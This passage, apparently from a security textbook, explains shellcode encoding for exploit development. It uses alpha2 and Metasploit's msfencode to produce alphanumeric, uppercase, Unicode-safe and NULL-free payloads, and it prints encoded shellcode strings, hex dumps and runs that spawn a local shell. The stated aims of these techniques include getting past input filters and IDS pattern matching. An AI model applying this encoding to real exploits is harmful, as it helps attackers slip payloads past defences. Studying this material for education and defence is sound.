Shellcode injection doesn't always make it into memory untouched. It can pass through functions that may reject or alter the payload; for example, the use of str*( )
functions will truncate the payload to the first NULL character. Some functions sanitize entries, such as checking that all characters are alphanumeric. Other functions may transform their entry, (e.g., into uppercase). And last but not least, classic payloads may be detected by an IDS.
Thus, it is very desirable to control the shape of a payload, avoiding forbidden characters or mutating, to prevent being detected by an IDS looking for known patterns. Shellcode done by hand can be written with those imposed properties, but it will usually be more convenient to create a shellcode without those limitations and change its shape later. A common approach is to write a loader by hand with those properties that will decode any payload and to append our encoded shellcode. Many tools can automate this step.
alpha2 is a shellcode encoder for x86 that is able to transform an arbitrary sequence of instructions into a fully alphanumeric one. It also provides uppercase output and shellcode capable of being converted into Unicode.
A problem with alphanumeric shellcode on x86 is not entirely resolved, though. The in-place decoding technique needs to know which address the shellcode has been injected into. A piece of code recovering this address is classically called a getPC[31] code. There is no known alphanumeric getPC code yet. A solution for the moment uses Structured Exception Handlers (SEH) on Windows. It works well, but it is not universal. Another common solution is to provide the shellcode with its position or a place to get it. In both cases, we do not have a one-size-fits-all solution.
Once we get specific about platforms and operating systems, things get lot easier. If the target is on Windows, we can use the SEH getPC. On Unix, if we target a specific vulnerability, then we know the state of the process at the time of exploitation. As shellcode has been injected somewhere, there should have been a place where the address of this "somewhere" has been stored. This is the place we have to know before generating the shellcode.
For example, let's test the encoded shellcode with the loader presented earlier in this chapter in the section "A Shellcode Loader." The way the shellcode is called is:
0x080484e4 <main+240>: call *%eax
This means that when the shellcode gets called, EAX
points to it. Thus, we just have to tell alpha2
to generate a shellcode that will use the content of the EAX
register to learn its location and decode its payload:
$ alpha2 eax < hello.egg > alpha.egg $ chmod +x alpha.egg $ ./alpha.egg Hello world! $ cat alpha.egg PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIpUOym53gV6bskXuPgpwp7p3kk1o 3l5YoKO9oK3JLwlilnm1mHXNmoCBxuP7p5PnYuSWps0Wp8s95nm65jx1vy5K9kaMSytJPMofaC0c05P MhfdUP5PUPLzVn30ePWpRsNikKzmmPqKoyzXv3OKtEwpUPGpXMopQKlMau8tqK1NQOkyO3CxQurLrL2 OwP1grO0rRLU4wQUZUPGzA
Obviously, if we do the same with another register, it will not work:
$ alpha2 ebx < hello.egg > alpha.egg $ ./alpha.egg Segmentation fault (core dumped)
alpha2
is also able to generate shellcode with only uppercase characters. This allows it to survive any data manipulation that converts input to uppercase characters:
$ alpha2 --uppercase eax < hello.egg PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIF5MYZEPWQFPSJHUPC05P EP1KMQO3JUKOKOKOLCJL5LKLLMSM9HLM83PX5PEPUPOIC330C030JSOULMPU8XSVY5K9N1LCJDJPOOE QUPEPS0OHS45PUPS0OJTNEPS0UPV3MYKK8MMPQKLIZXQCOKUUUP5PS0XMMPQKLMREL41KQNQOXIISW8 U5RLRLROWPRWROT2BLU4Q14JUPDJA
Many Windows programs will convert entries to Unicode UTF-16 encoding. Strings using ASCII encoding will have a NULL ASCII character inserted after each byte on little-endian architectures. alpha2
is able to generate a string that, when passed through an ASCII to UTF-16 encoding transformation, will become an equivalent to the shellcode provided in input.
First, turn the shellcode into a string suitable for transformation:
$ ./alpha2 --nocompress --unicode eax < binsh.egg > binsh.unicode.not.egg.yet
Then simulate what would occur during an ASCII to UTF-16 translation with this small Python code:
>>> import codecs >>> not_egg_yet = open("binsh.unicode.not.egg.yet").read( ) >>> egg = not_egg_yet.encode("utf_16")[2:] >>> open("binsh.unicode.egg","w").write(egg)
Finally, run it:
$ chmod +x ./binsh.unicode.egg $ ./binsh.unicode.egg sh-3.1$
Metasploit Framework comes with a program called msfencoder that can encode shellcodes. It provides many encoding techniques suitable for most cases on x86. Other architectures support tends to be poor, as we can see from the list of existing encoders:
$ ./msfencode -l Framework Encoders ================== Name Rank Description ---- ---- ----------- cmd/generic_sh normal Generic Shell Variable Substitution Command Encoder generic/none normal The "none" Encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower average Avoid UTF8/tolower x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive great Polymorphic Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/shikata_ga_nai excellent olymorphic XOR Additive Feedback Encoder x86/unicode_mixed low Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper low Alpha2 Alphanumeric Unicode Uppercase Encoder
Table 10-1 lists the supported options.
Table 10-1. Options for msfencoder
Option | Description |
---|---|
| The architecture to encode as. |
| The list of characters to avoid. |
| The encoder to use. |
| Encode the contents of the supplied file path. |
| List available encoders. |
| Dump encoder information. |
| The maximum size of the encoded data. |
| The format to display the encoded buffer with (raw, ruby, perl, c). |
Let's examine msfencoder by beginning with this shellcode generated by GCC:
$ ./hello.egg Hello world! $ hd hello.egg 00000000 55 89 e5 57 56 53 e8 00 00 00 00 5b 81 c3 f5 ff |U..WVS.....[....| 00000010 ff ff 83 ec 1c fc 8d 7d d8 8d b3 58 00 00 00 b9 |.......}...X....| 00000020 03 00 00 00 f3 a5 8d 55 d8 66 a5 89 d1 83 e4 f0 |.......U.f......| 00000030 bf 01 00 00 00 b8 04 00 00 00 ba 0e 00 00 00 53 |...............S| 00000040 89 fb cd 80 5b 89 f8 53 bb 05 00 00 00 cd 80 5b |....[..S.......[| 00000050 8d 65 f4 5b 5e 5f c9 c3 48 65 6c 6c 6f 20 77 6f |.e.[^_..Hello wo| 00000060 72 6c 64 21 0a 00 0a |rld!...| 00000067
Note that there are many 0x00 characters that will stop str*( )
functions. Injection would be partial. We need to remove them. By default, msfencoder will only encode using the shikata ga nai default encoding method (a Japanese colloquialism roughly translatable as "there is no choice" or "it can't be helped"). We have to give the additional constraint of avoiding 0x00 characters with the -b '\x00'
option. msfencoder will try all encoders ordered by rank until one returns an acceptable result:
$ ./msfencode -t raw -b '\x00' < hello.egg > encoded.egg [*] x86/shikata_ga_nai succeeded, final size 131 $ chmod +x encoded.egg $ ./encoded.egg Hello world!
Now we have a 131-byte shellcode equivalent to the original 103 byte shellcode, but without any NULL characters:
$ hd encoded.egg 00000000 db c4 d9 74 24 f4 58 29 c9 b1 1b bb 9d aa 66 bf |...t$.X)......f.| 00000010 31 58 17 83 e8 fc 03 c5 b9 84 4a a0 34 ad e2 1c |1X........J.4...| 00000020 14 c6 0d a0 9a 16 55 21 59 e3 96 de a1 8f 85 3c |......U!Y......<| 00000030 a2 1d 28 e4 d7 ad 8b 14 e8 d1 92 17 e8 d1 e4 e4 |..(.............| 00000040 4d 5c b1 d2 e8 fa b3 33 77 e0 34 0c 79 e9 b4 72 |M\.....3w.4.y..r| 00000050 c2 ed b4 72 32 54 ba 72 32 a8 90 fb c9 65 96 a0 |...r2T.r2....e..| 00000060 a4 8e c4 ed b2 6e eb 11 70 ee b0 9c ef 1b 1d c0 |.....n..p.......| 00000070 b0 2a 61 b4 2b c1 0a 2b 94 6e bc c1 b8 f4 63 2f |.*a.+..+.n....c/| 00000080 41 ff 63 |A.c| 00000083
msfencode also includes some features and capabilities borrowed from the alpha2 tool, such as the following:
$ ./msfencode -t raw -e x86/alpha_upper < binsh.egg > binsh_alpha.egg [*] x86/alpha_upper succeeded, final size 141 $ cat binsh_alpha.egg PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIFQIPF0E6F0E6BHFMD0M YJFBHFOD3CXNJK0D4GTESNJE8FOBBCYBNLIJCF0QFQCLIKQK9HBNPDKHMK0HLAA $ chmod +x binsh_alpha.egg $ ./binsh_alpha.egg sh-3.1$
[31] PC means Program Counter; i.e., the register that keeps the address of the currently executed instruction. It is called EIP on x86.